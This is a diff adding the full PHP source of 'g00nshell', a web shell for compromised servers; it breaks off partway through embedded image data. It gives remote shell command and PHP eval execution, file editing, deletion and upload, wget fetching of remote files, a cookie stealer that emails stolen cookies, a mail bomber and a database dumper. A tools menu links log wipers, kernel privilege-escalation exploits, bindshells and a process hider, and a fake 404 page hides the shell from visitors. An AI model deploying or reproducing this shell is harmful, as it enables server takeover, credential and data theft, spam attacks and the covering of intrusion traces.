+// Configuration
+$auth = 0;
+$uakey = "724ea055b975621b9d679f7077257bd9"; // MD5 encoded user-agent
+$IP = array("127.0.0.2","127.0.0.1"); // IP Addresses allowed to access shell
+$email = ""; // E-mail address where cookies will be sent
+$user = "55c4b3899b00d20543d41170d2775e8f"; // MD5 encoded User
+$pass = "8634361d1a2e44420f44ef3612706bb5"; // MD5 encoded Password
+
+// Global Variables
+$version = "1.3 final";
+$self = $_SERVER['PHP_SELF'];
+$soft = $_SERVER["SERVER_SOFTWARE"];
+$servinf = split("[:]", getenv('HTTP_HOST'));
+$servip = $servinf[0];
+$servport = $servinf[1];
+$uname = php_uname();
+$curuser = @exec('whoami');
+$cmd = $_GET['cmd'];
+$act = $_GET['act'];
+$cmd = $_GET['cmd'];
+$cookie = $_GET['cookie'];
+$f = $_GET['f'];
+$curdir = cleandir(getcwd());
+if(!$dir){$dir = $_GET['dir'];}
+elseif($dir && $_SESSION['dir']){$dir = $_SESSION['dir'];}
+elseif($dir && $_SESSION['dir']){$dir = $curdir;}
+if($dir && $dir != "nullz"){$dir = cleandir($dir);}
+$contents = $_POST['contents'];
+$gf = $_POST['gf'];
+$img = $_GET['img'];
+session_start();
+@set_time_limit(5);
+switch($auth){ // Authentication switcher
+case 0: break;
+case 1: if(md5($_SERVER['HTTP_USER_AGENT']) != $uakey){hide();} break;
+case 2: if(!in_array($_SERVER['REMOTE_ADDR'],$IP)){hide();} break;
+case 3: if(!$_SERVER["PHP_AUTH_USER"]){userauth();} break;
+}
+
+function userauth(){ // Basic authentication function
+global $user, $pass;
+header("WWW-Authenticate: Basic realm='Secure Area'");
+if(md5($_SERVER["PHP_AUTH_USER"]) != $user || md5($_SERVER["PHP_AUTH_PW"] != $pass)){
+hide();
+die();
+}
+}
+
+if(!$act && !$cmd && !$cookie && !$f && !$dir && !$gf && !$img){main();}
+elseif(!$act && $cmd){
+style();
+echo("<b>Results:</b>\n<br><textarea rows=20 cols=100>");
+$cmd = exec($cmd, $result);
+foreach($result as $line){echo($line . "\n");}
+echo("</textarea>");
+}
+elseif($cookie){@mail("$email", "Cookie Data", "$cookie", "From: $email"); hide();} // Cookie stealer function
+elseif($act == "view" && $f && $dir){view($f, $dir);}
+elseif($img){img($img);}
+elseif($gf){grab($gf);}
+elseif($dir){files($dir);}
+else{
+switch($act){
+case "phpinfo": phpinfo();break;
+case "sql": sql();break;
+case "files": files($dir);break;
+case "email": email();break;
+case "cmd": cmd();break;
+case "upload": upload();break;
+case "tools": tools();break;
+case "sqllogin": sqllogin();break;
+case "sql": sql();break;
+case "lookup": lookup();break;
+case "kill": kill();break;
+case "phpexec": execphp();break;
+default: main();break;
+}
+}
+
+function cleandir($d){ // Function to clean up the $dir and $curdir variables
+$d = realpath($d);
+$d = str_replace("\\\\", "//", $d);
+$d = str_replace("////", "//", $d);
+$d = str_replace("\\", "/", $d);
+return($d);
+}
+
+
+
+function hide(){ // Hiding function
+global $self, $soft, $servip, $servport;
+die("<!DOCTYPE HTML PUBLIC '-//IETF//DTD HTML 2.0//EN'>
+<HTML><HEAD>
+<TITLE>404 Not Found</TITLE>
+</HEAD><BODY>
+<H1>Not Found</H1>
+The requested URL $self was not found on this server.<P>
+<P>Additionally, a 404 Not Found
+error was encountered while trying to use an ErrorDocument to handle the request.
+<HR>
+<ADDRESS>$soft Server at $servip Port $servport</ADDRESS>
+</BODY></HTML>");
+}
+
+function style(){ // Style / header function
+global $servip,$version;
+echo("<html>\n
+<head>\n
+<title>g00nshell v" . $version . " - " . $servip . "</title>\n
+<style>\n
+body { background-color:#000000; color:white; font-family:Verdana; font-size:11px; }\n
+h1 { color:white; font-family:Verdana; font-size:11px; }\n
+h3 { color:white; font-family:Verdana; font-size:11px; }\n
+input,textarea,select { color:#FFFFFF; background-color:#2F2F2F; border:1px solid #4F4F4F; font-family:Verdana; font-size:11px; }\n
+textarea { font-family:Courier; font-size:11px; }\n
+a { color:#6F6F6F; text-decoration:none; font-family:Verdana; font-size:11px; }\n
+a:hover { color:#7F7F7F; }\n
+td,th { font-size:12px; vertical-align:middle; }\n
+th { font-size:13px; }\n
+table { empty-cells:show;}\n
+.inf { color:#7F7F7F; }\n
+</style>\n
+</head>\n");
+}
+
+function main(){ // Main/menu function
+global $self, $servip, $servport, $uname, $soft, $banner, $curuser, $version;
+style();
+$act = array('cmd'=>'Command Execute','files'=>'File View','phpinfo'=>'PHP info', 'phpexec'=>'PHP Execute',
+'tools'=>'Tools','sqllogin'=>'SQL','email'=>'Email','upload'=>'Get Files','lookup'=>'List Domains','bshell'=>'Bindshell','kill'=>'Kill Shell');
+$capt = array_flip($act);
+echo("<form method='GET' name='shell'>");
+echo("<b>Host:</b> <span class='inf'>" . $servip . "</span><br>");
+echo("<b>Server software:</b> <span class='inf'>" . $soft . "</span><br>");
+echo("<b>Uname:</b> <span class='inf'>" . $uname . "</span><br>");
+echo("<b>Shell Directory:</b> <span class='inf'>" . getcwd() . "</span><br>");
+echo("<div style='display:none' id='info'>");
+echo("<b>Current User:</b> <span class='inf'>" . $curuser . "</span><br>");
+echo("<b>ID:</b> <span class='inf'>" . @exec('id') . "</span><br>");
+if(@ini_get('safe_mode') != ""){echo("<b>Safemode:</b> <font color='red'>ON</font>");}
+else{echo("<b>Safemode:</b> <font color='green'>OFF</font>");}
+echo("\n<br>\n");
+if(@ini_get('open_basedir') != ""){echo("<b>Open Base Dir:</b> <font color='red'>ON</font> [ <span class='inf'>" . ini_get('open_basedir') . "</span> ]");}
+else{echo("<b>Open Base Dir:</b> <font color='green'>OFF</font>");}
+echo("\n<br>\n");
+if(@ini_get('disable_functions') != ""){echo("<b>Disabled functions:</b> " . @ini_get('disable_functions'));}
+else{echo("<b>Disabled functions:</b> None");}
+echo("\n<br>\n");
+if(@function_exists(mysql_connect)){echo("<b>MySQL:</b> <font color='green'>ON</font>");}
+else{echo("<b>MySQL:</b> <font color='red'>OFF</font>");}
+echo("</div>");
+echo("[ <a href='#hax' onClick=\"document.getElementById('info').style.display = 'block';\">More</a> ] ");
+echo("[ <a href='#hax' onClick=\"document.getElementById('info').style.display = 'none';\">Less</a> ]");
+echo("<center>");
+echo("<h3 align='center'>Links</h3>");
+if($_SERVER['QUERY_STRING']){foreach($act as $link){echo("[ <a href='?" . $_SERVER['QUERY_STRING'] . "&act=" . $capt[$link] . "' target='frm'>" . $link . "</a> ] ");}}
+else{foreach($act as $link){echo("[ <a href='?act=" . $capt[$link] . "' target='frm'>" . $link . "</a> ] ");}}
+echo("</center>");
+echo("<hr>");
+echo("<br><iframe name='frm' style='width:100%; height:65%; border:0;' src='?act=files'></iframe>");
+echo("<pre style='text-align:center'>:: g00nshell <font color='red'>v" . $version . "</font> ::</pre>");
+die();
+}
+
+function cmd(){ // Command execution function
+style();
+echo("<form name='CMD' method='POST'>");
+echo("<b>Command:</b><br>");
+echo("<input name='cmd' type='text' size='50'> ");
+echo("<select name='precmd'>");
+$precmd = array(''=>'','Read /etc/passwd'=>'cat /etc/passwd','Open ports'=>'netstat -an',
+'Running Processes'=>'ps -aux', 'Uname'=>'uname -a', 'Get UID'=>'id',
+'Create Junkfile (/tmp/z)'=>'dd if=/dev/zero of=/tmp/z bs=1M count=1024',
+'Find passwd files'=>'find / -type f -name passwd');
+$capt = array_flip($precmd);
+foreach($precmd as $c){echo("<option value='" . $c . "'>" . $capt[$c] . "\n");}
+echo("</select><br>\n");
+echo("<input type='submit' value='Execute'>\n");
+echo("</form>\n");
+if($_POST['cmd'] != ""){$x = $_POST['cmd'];}
+elseif($_POST['precmd'] != ""){$x = $_POST['precmd'];}
+else{die();}
+echo("Results: <br><textarea rows=20 cols=100>");
+$cmd = @exec($x, $result);
+foreach($result as $line){echo($line . "\n");}
+echo("</textarea>");
+}
+
+function execphp(){ // PHP code execution function
+style();
+echo("<h4>Execute PHP Code</h4>");
+echo("<form method='POST'>");
+echo("<textarea name='phpexec' rows=5 cols=100>");
+if(!$_POST['phpexec']){echo("/*Don't include <? ?> tags*/\n");}
+echo(htmlentities($_POST['phpexec']) . "</textarea>\n<br>\n");
+echo("<input type='submit' value='Execute'>");
+echo("</form>");
+if($_POST['phpexec']){
+echo("<textarea rows=10 cols=100>");
+eval(stripslashes($_POST['phpexec']));
+echo("</textarea>");
+}
+}
+
+function sqllogin(){ // MySQL login function
+session_start();
+if($_SESSION['isloggedin'] == "true"){
+header("Location: ?act=sql");
+}
+style();
+echo("<form method='post' action='?act=sql'>");
+echo("User:<br><input type='text' name='un' size='30'><br>\n");
+echo("Password:<br><input type='text' name='pw' size='30'><br>\n");
+echo("Host:<br><input type='text' name='host' size='30' value='localhost'><br>\n");
+echo("Port:<br><input type='text' name='port' size='30' value='3306'><br>\n");
+echo("<input type='submit' value='Login'>");
+echo("</form>");
+die();
+}
+
+function sql(){ // General SQL Function
+session_start();
+if(!$_GET['sqlf']){style();}
+if($_POST['un'] && $_POST['pw']){;
+$_SESSION['sql_user'] = $_POST['un'];
+$_SESSION['sql_password'] = $_POST['pw'];
+}
+if($_POST['host']){$_SESSION['sql_host'] = $_POST['host'];}
+else{$_SESSION['sql_host'] = 'localhost';}
+if($_POST['port']){$_SESSION['sql_port'] = $_POST['port'];}
+else{$_SESSION['sql_port'] = '3306';}
+
+if($_SESSION['sql_user'] && $_SESSION['sql_password']){
+if(!($sqlcon = @mysql_connect($_SESSION['sql_host'] . ':' . $_SESSION['sql_port'], $_SESSION['sql_user'], $_SESSION['sql_password']))){
+unset($_SESSION['sql_user'], $_SESSION['sql_password'], $_SESSION['sql_host'], $_SESSION['sql_port']);
+echo("Invalid credentials<br>\n");
+die(sqllogin());
+}
+else{
+$_SESSION['isloggedin'] = "true";
+}
+}
+else{
+die(sqllogin());
+}
+
+if ($_GET['db']){
+mysql_select_db($_GET['db'], $sqlcon);
+if($_GET['sqlquery']){
+$dat = mysql_query($_GET['sqlquery'], $sqlcon) or die(mysql_error());
+$num = mysql_num_rows($dat);
+for($i=0;$i<$num;$i++){
+echo(mysql_result($dat, $i) . "<br>\n");
+}
+}
+else if($_GET['table'] && !$_GET['sqlf']){
+echo("<a href='?act=sql&db=" . $_GET['db'] . "&table=" . $_GET['table'] . "&sqlf=ins'>Insert Row</a><br><br>\n");
+echo("<table border='1'>");
+$query = "SHOW COLUMNS FROM " . $_GET['table'];
+$result = mysql_query($query, $sqlcon) or die(mysql_error());
+$i = 0;
+$fields = array();
+while($row = mysql_fetch_assoc($result)){
+array_push($fields, $row['Field']);
+echo("<th>" . $fields[$i]);
+$i++;
+}
+$result = mysql_query("SELECT * FROM " . $_GET['table'], $sqlcon) or die(mysql_error());
+$num_rows = mysql_num_rows($result) or die(mysql_error());
+$y=0;
+for($x=1;$x<=$num_rows+1;$x++){
+if(!$_GET['p']){
+$_GET['p'] = 1;
+}
+if($_GET['p']){
+if($y > (30*($_GET['p']-1)) && $y <= 30*($_GET['p'])){
+echo("<tr>");
+for($i=0;$i<count($fields);$i++){
+$query = "SELECT " . $fields[$i] . " FROM " . $_GET['table'] . " WHERE " . $fields[0] . " = '" . $x . "'";
+$dat = mysql_query($query, $sqlcon) or die(mysql_error());
+while($row = mysql_fetch_row($dat)){
+echo("<td>" . $row[0] . "</td>");
+}
+}
+echo("</tr>\n");
+}
+}
+$y++;
+}
+echo("</table>\n");
+for($z=1;$z<=ceil($num_rows / 30);$z++){
+echo("<a href='?act=sql&db=" . $_GET['db'] . "&table=" . $_GET['table'] . "&p=" . $z . "'>" . $z . "</a> | ");
+}
+}
+elseif($_GET['table'] && $_GET['sqlf']){
+switch($_GET['sqlf']){
+case "dl": sqldownload();break;
+case "ins": sqlinsert();break;
+default: $_GET['sqlf'] = "";
+}
+}
+else{
+echo("<table>");
+$query = "SHOW TABLES FROM " . $_GET['db'];
+$dat = mysql_query($query, $sqlcon) or die(mysql_error());
+while ($row = mysql_fetch_row($dat)){
+echo("<tr><td><a href='?act=sql&db=" . $_GET['db'] . "&table=" . $row[0] ."'>" . $row[0] . "</a></td><td>[<a href='?act=sql&db=" . $_GET['db'] . "&table=" . $row[0] ."&sqlf=dl'>Download</a>]</td></tr>\n");
+}
+echo("</table>");
+}
+}
+else{
+$dbs=mysql_list_dbs($sqlcon);
+while($row = mysql_fetch_object($dbs)) {
+echo("<a href='?act=sql&db=" . $row->Database . "'>" . $row->Database . "</a><br>\n");
+}
+}
+mysql_close($sqlcon);
+}
+
+function sqldownload(){ // Download sql file function
+@ob_flush;
+$sqlcon = @mysql_connect($_SESSION['sql_host'] . ':' . $_SESSION['sql_port'], $_SESSION['sql_user'], $_SESSION['sql_password']);
+mysql_select_db($_GET['db'], $sqlcon);
+$query = "SHOW COLUMNS FROM " . $_GET['table'];
+$result = mysql_query($query, $sqlcon) or die(mysql_error());
+$fields = array();
+while($row = mysql_fetch_assoc($result)){
+array_push($fields, $row['Field']);
+$i++;
+}
+$result = mysql_query("SELECT * FROM " . $_GET['table'], $sqlcon) or die(mysql_error());
+$num_rows = mysql_num_rows($result) or die(mysql_error());
+for($x=1;$x<$num_rows;$x++){
+$out .= "(";
+for($i=0;$i<count($fields);$i++){
+$out .= "'";
+$query = "SELECT " . $fields[$i] . " FROM " . $_GET['table'] . " WHERE " . $fields[0] . " = '" . $x . "'";
+$dat = mysql_query($query, $sqlcon) or die(mysql_error());
+while($row = mysql_fetch_row($dat)){
+if($row[0] == ""){
+$row[0] = "NULL";
+}
+if($i != count($fields)-1){
+$out .= str_replace("\r\n", "\\r\\n", $row[0]) . "', ";
+}
+else{
+$out .= $row[0]. "'";
+}
+}
+}
+$out .= ");\n";
+}
+$filename = $_GET['table'] . "-" . time() . '.sql';
+header("Content-type: application/octet-stream");
+header("Content-length: " . strlen($out));
+header("Content-disposition: attachment; filename=" . $filename . ";");
+echo($out);
+die();
+}
+
+function sqlinsert(){
+style();
+$sqlcon = @mysql_connect($_SESSION['sql_host'] . ':' . $_SESSION['sql_port'], $_SESSION['sql_user'], $_SESSION['sql_password']);
+mysql_select_db($_GET['db'], $sqlcon);
+if($_POST['ins']){
+unset($_POST['ins']);
+$fields = array_flip($_POST);
+$f = implode(",", $fields);
+$v = implode(",", $_POST);
+$query = "INSERT INTO " . $_GET['table'] . " (" . $f . ") VALUES (" . $v . ")";
+mysql_query($query, $sqlcon) or die(mysql_error());
+die("Row inserted.<br>\n<a href='?act=sql&db=" . $_GET['db'] . "&table=" . $_GET['table'] . "'>Go back</a>");
+}
+$query = "SHOW COLUMNS FROM " . $_GET['table'];
+$result = mysql_query($query, $sqlcon) or die(mysql_error());
+$i = 0;
+$fields = array();
+echo("<form method='POST'>");
+echo("<table>");
+while($row = mysql_fetch_assoc($result)){
+array_push($fields, $row['Field']);
+echo("<tr><td><b>" . $fields[$i] . "</b><td><input type='text' name='" . $fields[$i] . "'><br>\n");
+$i++;
+}
+echo("</table>");
+echo("<br>\n<input type='submit' value='Insert' name='ins'>");
+echo("</form>");
+}
+
+function nicesize($size){
+if(!$size){return false;}
+if ($size >= 1073741824){return(round($size / 1073741824) . " GB");}
+elseif ($size >= 1048576){return(round($size / 1048576) . " MB");}
+elseif ($size >= 1024){return(round($size / 1024) . " KB");}
+else{return($size . " B");}
+}
+
+function files($dir){ // File manipulator function
+style();
+global $self, $curdir;
+if($dir==""){$dir = $curdir;}
+$dirx = explode("/", $dir);
+$files = array();
+$folders = array();
+echo("<form method='GET'>");
+echo("<input type='text' name='dir' value='" . $dir . "' size='40'>");
+echo("<input type='submit' value='Go'>");
+echo("</form>");
+echo("<h4>File list for ");
+for($i=0;$i<count($dirx);$i++){
+$totalpath .= $dirx[$i] . "/";
+echo("<a href='?dir=" . $totalpath . "'>$dirx[$i]</a>" . "/");
+}
+echo("</h4>");
+echo("<table>");
+echo("<th>File Name<th>File Size</th>");
+if ($handle = opendir($dir)) {
+while (false != ($link = readdir($handle))) {
+if (is_dir($dir . '/' . $link)){
+$file = array();
+if(is_writable($dir . '/' . $link)){$file['perm']='write';}
+elseif(is_readable($dir . '/' . $link)){$file['perm']='read';}
+else{$file['perm']='none';}
+switch($file['perm']){
+case "write": @$file['link'] = "<a href='?dir=$dir/$link'><font color='green'>$link</font></a>"; break;
+case "read": @$file['link'] = "<a href='?dir=$dir/$link'><font color='yellow'>$link</font></a>"; break;
+case "none": @$file['link'] = "<a href='?dir=$dir/$link'><font color='red'>$link</font></a>"; break;
+default: @$file['link'] = "<a href='?dir=$dir/$link'><font color='red'>$link</font></a>"; break;
+}
+@$file['icon'] = "folder";
+if($_SERVER['QUERY_STRING']){$folder = "<img src='?" . $_SERVER['QUERY_STRING'] . "&img=" . $file['icon']. "'> " . $file['link'];}
+else{$folder = "<img src='?img=" . $file['icon']. "'> " . $file['link'];}
+array_push($folders, $folder);
+}
+else{
+$file = array();
+$ext = strtolower(end(explode(".", $link)));
+if(!$file['size'] = nicesize(@filesize($dir . '/' . $link))){
+$file['size'] = "0B";
+}
+if(is_writable($dir . '/' . $link)){$file['perm']='write';}
+elseif(is_readable($dir . '/' . $link)){$file['perm']='read';}
+else{$file['perm']='none';}
+switch($file['perm']){
+case "write": @$file['link'] = "<a href='?act=view&f=" . $link . "&dir=$dir'><font color='green'>$link</font></a>"; break;
+case "read": @$file['link'] = "<a href='?act=view&f=" . $link . "&dir=$dir'><font color='yellow'>$link</font></a>"; break;
+case "none": @$file['link'] = "<a href='?act=view&f=" . $link . "&dir=$dir'><font color='red'>$link</font></a>"; break;
+default: @$file['link'] = "<a href='?act=view&f=" . $link . "&dir=$dir'><font color='red'>$link</a></font>"; break;
+}
+switch($ext){
+case "exe": case "com": case "jar": case "": $file['icon']="binary"; break;
+case "jpg": case "gif": case "png": case "bmp": $file['icon']="image"; break;
+case "zip": case "tar": case "rar": case "gz": case "cab": case "bz2": case "gzip": $file['icon']="compressed"; break;
+case "txt": case "doc": case "pdf": case "htm": case "html": case "rtf": $file['icon']="text"; break;
+case "wav": case "mp3": case "mp4": case "wma": $file['icon']="sound"; break;
+case "js": case "vbs": case "c": case "h": case "sh": case "pl": case "py": case "php": case "h": $file['icon']="script"; break;
+default: $file['icon'] = "unknown"; break;
+}
+if($_SERVER['QUERY_STRING']){$file = "<tr><td><img src='?" . $_SERVER['QUERY_STRING'] . "&img=" . $file['icon']. "' height='18' width='18'> " . $file['link'] . "</td><td>" . $file['size'] . "</td></tr>\n";}
+else{$file = "<tr><td><img src='?img=" . $file['icon']. "' height='18' width='18'> " . $file['link'] . "<td>" . $file['size'] . "</td></tr>\n";}
+array_push($files, $file);
+}
+}
+foreach($folders as $folder){echo("<tr><td>$folder</td><td>DIR</td></tr>\n");}
+foreach($files as $file){echo($file);}
+echo("</table>");
+closedir($handle);
+}
+}
+
+function email(){ // Email bomber function
+$times = $_POST['times'];
+$to = $_POST['to'];
+$subject = $_POST['subject'];
+$body = $_POST['body'];
+$from = $_POST['from'];
+
+style();
+echo("<h2>Mail Bomber</h2>
+<form method='POST' action='?act=email'>
+<b>Your address:</b><br>
+<input name='from' type='text' size='35'><br>
+<b>Their address:</b><br>
+<input name='to' type='text' size='35'><br>
+<b>Subject:</b><br>
+<input name='subject' type='text' size='35'><br>
+<b>Text:</b><br>
+<input name='body' type='text' size='35'><br>
+<b>How many times:</b><br>
+<input name='times' type='text' size='5'><br><br>
+<input name='submit' type='submit' value='Submit'>
+</form>");
+if ($to && $from){for($i=0;$i<$times;$i++){mail("$to", "$subject", "$body", "From: $from");}}
+}
+
+function view($filename, $dir){ // File view function
+if($_POST['fileact'] == "Download"){
+header("Content-type: application/octet-stream");
+header("Content-length: ".strlen($_POST['contents']));
+header("Content-disposition: attachment; filename=" . basename($filename) . ";");
+$handle = fopen($filename, "r");
+echo(fread($handle, filesize($filename)));
+die();
+}
+style();
+if($_POST['contents'] && $_POST['fileact'] == "Save"){
+$handle = fopen($filename, 'w');
+fwrite($handle, stripslashes($_POST['contents']));
+fclose($handle);
+echo("Saved file.<br><br>");
+echo("<a href='?act=view&f=$filename&dir=nullz'>Go back</a>");
+die();
+}
+elseif($_POST['fileact'] == "Delete"){
+unlink($filename);
+echo("Deleted file.<br><br>");
+echo("<a href='?act=files'>Go back</a>");
+die();
+}
+
+if($dir != "nullz"){ // heh
+$filename = $dir."/".$filename;
+}
+$bad = array("<", ">");
+$good = array("<", ">");
+$file = fopen($filename, 'r');
+$content = fread($file, @filesize($filename));
+echo("<form name='file' method='POST' action='?act=view&dir=$dir&f=$filename'>");
+echo("<textarea style='width:100%; height:92%;' name='contents'>");
+echo(str_replace($bad, $good, $content)."\n");
+echo("</textarea>");
+echo("<input name='fileact' type='submit' value='Save'>");
+echo("<input name='fileact' type='submit' value='Delete'>");
+echo("<input name='fileact' type='submit' value='Download'>");
+echo("</form>");
+}
+
+function edit($file, $contents){ // File edit function
+style();
+$handle = fopen($file, 'w');
+fwrite($handle, $contents);
+fclose($handle);
+echo("Saved file.<br><br>");
+echo("<a href='?act=files'>Go back</a>");
+}
+
+function upload(){ // Uploading frontend function
+global $curdir;
+style();
+echo("<form name='files' enctype='multipart/form-data' method='POST'>
+<b>Output Directory</b><br>
+<input type='text' name='loc' size='65' value='" . $curdir . "'><br><br>
+<b>Remote Upload</b><br>
+<input type='text' name='rem' size='65'>
+<input type='submit' value='Grab'><br><br>
+<b>Local File Upload</b><br>
+<input name='up' type='file' size='65'>
+<input type='submit' value='Upload'>
+</form><br>");
+
+if($_POST['rem']){grab($_POST['rem']);}
+if($_FILES['up']){up($_FILES['up']);}
+}
+
+function up($up){ // Uploading backend function
+style();
+$updir = $_POST['loc'];
+move_uploaded_file($up["tmp_name"], $updir . "/" . $up["name"]);
+die("File has been uploaded.");
+}
+
+function grab($file){ // Uploading backend function
+style();
+$updir = $_POST['loc'];
+$filex = array_pop(explode("/", $file));
+if(exec("wget $file -b -O $updir/$filex")){die("File has been uploaded.");}
+else{die("File upload failed.");}
+}
+
+function tools(){ // Useful tools function
+global $curdir;
+style();
+$tools = array(
+"--- Log wipers ---"=>"1",
+"Vanish2.tgz"=>"http://packetstormsecurity.org/UNIX/penetration/log-wipers/vanish2.tgz",
+"Cloak.c"=>"http://packetstormsecurity.org/UNIX/penetration/log-wipers/cloak.c",
+"gh0st.sh"=>"http://packetstormsecurity.org/UNIX/penetration/log-wipers/gh0st.sh",
+"--- Priv Escalation ---"=>"2",
+"h00lyshit - Linux 2.6 ALL"=>"http://someshit.net/files/xpl/h00lyshit",
+"k-rad3 - Linux <= 2.6.11"=>"http://someshit.net/files/xpl/krad3",
+"raptor - Linux <= 2.6.17.4"=>"http://someshit.net/files/xpl/raptor",
+"rootbsd - BSD v?"=>"http://someshit.net/files/xpl/rootbsd",
+"--- Bindshells ---"=>"3",
+"THC rwwwshell-1.6.perl"=>"http://packetstormsecurity.org/groups/thc/rwwwshell-1.6.perl",
+"Basic Perl bindshell"=>"http://packetstormsecurity.org/groups/synnergy/bindshell-unix",
+"--- Misc ---"=>"4",
+"MOCKS SOCKS4 Proxy"=>"http://superb-east.dl.sourceforge.net/sourceforge/mocks/mocks-0.0.2.tar.gz",
+"xps.c (proc hider)"=>"http://packetstormsecurity.org/groups/shadowpenguin/unix-tools/xps.c");
+$names = array_flip($tools);
+echo("<b>Tools:</b>");
+echo("<form method='post'>");
+echo("<b>Output Directory</b><br>");
+echo("<input type='text' name='loc' size='65' value='" . $curdir . "'><br><br>");
+echo("<select name='gf' style='align:center;'>");
+foreach($tools as $tool) {echo("<option value='" . $tool . "'>" . $names[$tool] . "</option>\n");}
+echo("</select>");
+echo("<br><input type='submit' value='Grab'>");
+echo("</form>");
+}
+
+function lookup(){ // Domain lookup function
+style();
+global $servinf;
+$script = "import urllib, urllib2, sys, re
+req = urllib2.Request('http://www.seologs.com/ip-domains.html', urllib.urlencode({'domainname' : sys.argv[1]}))
+site = re.findall('.+\) (.+)<br>', urllib2.urlopen(req).read())
+for i in xrange(0,len(site)):
+print site[i]"; // My ***y python script
+$handle = fopen('lookup.py', 'w');
+fwrite($handle, $script);
+fclose($handle);
+echo("<h4>Domains</h4>");
+echo("<ul>");
+$cmd = exec("python lookup.py " . $servinf[0], $ret);
+foreach($ret as $site){echo("<li>" . $site . "\n");}
+unlink('lookup.py');
+}
+
+
+function img($img){ // Images function
+$images = array(
+"folder"=>"R0lGODlhEwAQALMAAAAAAP///5ycAM7OY///nP//zv/OnPf39////wAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAEAAA" .
+"gALAAAAAATABAAAARREMlJq7046yp6BxsiHEVBEAKYCUPrDp7HlXRdEoMqCebp/4YchffzGQhH4YRYPB2DOlHPiKwq" .
+"d1Pq8yrVVg3QYeH5RYK5rJfaFUUA3vB4fBIBADs=",
+"image"=>"R0lGODlhFAAWAOMAAP////8zM8z//8zMzJmZmWZmZmYAADMzMwCZzACZMwAzZgAAAAAAAAAAAAAAAAAAACH+TlRoaX" .
+"MgYXJ0IGlzIGluIHRoZSBwdWJsaWMgZG9tYWluLiBLZXZpbiBIdWdoZXMsIGtldmluaEBlaXQuY29tLCBTZXB0ZW1i" .
+"ZXIgMTk5NQAh+QQBAAACACwAAAAAFAAWAAAEkPDISae4WBzAu99Hdm1eSYYZWXYqOgJBLAcDoNrYNssGsBy/4GsX6y" .
+"2OyMWQ2OMQngSlBjZLWBM1AFSqkyU4A2tWywUMYt/wlTSIvgYGA/Zq3QwU7mmHvh4g8GUsfAUHCH95NwMHV4SGh4Ed" .
+"ihOOjy8rZpSVeiV+mYCWHncKo6Sfm5cliAdQrK1PQBlJsrNSEQA7",
+"unknown"=>"R0lGODlhFAAWAMIAAP///8z//5mZmTMzMwAAAAAAAAAAAAAAACH+TlRoaXMgYXJ0IGlzIGluIHRoZSBwdWJsaWMgZG" .
+"9tYWluLiBLZXZpbiBIdWdoZXMsIGtldmluaEBlaXQuY29tLCBTZXB0ZW1iZXIgMTk5NQAh+QQBAAABACwAAAAAFAAW" .
+"AAADaDi6vPEwDECrnSO+aTvPEQcIAmGaIrhR5XmKgMq1LkoMN7ECrjDWp52r0iPpJJ0KjUAq7SxLE+sI+9V8vycFiM" .
+"0iLb2O80s8JcfVJJTaGYrZYPNby5Ov6WolPD+XDJqAgSQ4EUCGQQEJADs=",
+"binary"=>"R0lGODlhFAAWAMIAAP///8z//8zMzJmZmTMzMwAAAAAAAAAAACH+TlRoaXMgYXJ0IGlzIGluIHRoZSBwdWJsaWMgZG" .
+"9tYWluLiBLZXZpbiBIdWdoZXMsIGtldmluaEBlaXQuY29tLCBTZXB0ZW1iZXIgMTk5NQAh+QQBAAABACwAAAAAFAAW" .
+"AAADaUi6vPEwEECrnSS+WQoQXSEAE6lxXgeopQmha+q1rhTfakHo/HaDnVFo6LMYKYPkoOADim4VJdOWkx2XvirUgq" .
+"VaVcbuxCn0hKe04znrIV/ROOvaG3+z63OYO6/uiwlKgYJJOxFDh4hTCQA7",
+"text"=>"R0lGODlhFAAWAOMAAP/////MM/8zM8z//5mZmZlmM2bM/zMzMwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH+TlRoaX" .
+"MgYXJ0IGlzIGluIHRoZSBwdWJsaWMgZG9tYWluLiBLZXZpbiBIdWdoZXMsIGtldmluaEBlaXQuY29tLCBTZXB0ZW1i" .
+"ZXIgMTk5NQAh+QQBAAADACwAAAAAFAAWAAAEb/DISee4eBzAu99Hdm1eSYbZWXEkgI5sEBg0+2HnTBsccvhAmGtXAy" .
+"COSITwUGg2PYQoQalhOZ/QKLVV6gKmQm8XXDUmzx0yV5ze9s7JdpgtL3ME5jhHTS/xO3hwdWt0f317WwdSi4xRPxlw" .
+"kUgXEQA7",
+"compressed"=>"R0lGODlhFAAWAOcAAP//////zP//mf//Zv//M///AP/M///MzP/Mmf/MZv/MM//MAP+Z//+ZzP+Zmf+ZZv+ZM/+ZAP" .
+"9m//9mzP9mmf9mZv9mM/9mAP8z//8zzP8zmf8zZv8zM/8zAP8A//8AzP8Amf8AZv8AM/8AAMz//8z/zMz/mcz/Zsz/" .
+"M8z/AMzM/8zMzMzMmczMZszMM8zMAMyZ/8yZzMyZmcyZZsyZM8yZAMxm/8xmzMxmmcxmZsxmM8xmAMwz/8wzzMwzmc" .
+"wzZswzM8wzAMwA/8wAzMwAmcwAZswAM8wAAJn//5n/zJn/mZn/Zpn/M5n/AJnM/5nMzJnMmZnMZpnMM5nMAJmZ/5mZ" .
+"zJmZmZmZZpmZM5mZAJlm/5lmzJlmmZlmZplmM5lmAJkz/5kzzJkzmZkzZpkzM5kzAJkA/5kAzJkAmZkAZpkAM5kAAG" .
+"b//2b/zGb/mWb/Zmb/M2b/AGbM/2bMzGbMmWbMZmbMM2bMAGaZ/2aZzGaZmWaZZmaZM2aZAGZm/2ZmzGZmmWZmZmZm" .
+"M2ZmAGYz/2YzzGYzmWYzZmYzM2YzAGYA/2YAzGYAmWYAZmYAM2YAADP//zP/zDP/mTP/ZjP/MzP/ADPM/zPMzDPMmT" .
+"PMZjPMMzPMADOZ/zOZzDOZmTOZZjOZMzOZADNm/zNmzDNmmTNmZjNmMzNmADMz/zMzzDMzmTMzZjMzMzMzADMA/zMA" .
+"zDMAmTMAZjMAMzMAAAD//wD/zAD/mQD/ZgD/MwD/AADM/wDMzADMmQDMZgDMMwDMAACZ/wCZzACZmQCZZgCZMwCZAA" .
+"Bm/wBmzABmmQBmZgBmMwBmAAAz/wAzzAAzmQAzZgAzMwAzAAAA/wAAzAAAmQAAZgAAM+4AAN0AALsAAKoAAIgAAHcA" .
+"AFUAAEQAACIAABEAAADuAADdAAC7AACqAACIAAB3AABVAABEAAAiAAARAAAA7gAA3QAAuwAAqgAAiAAAdwAAVQAARA" .
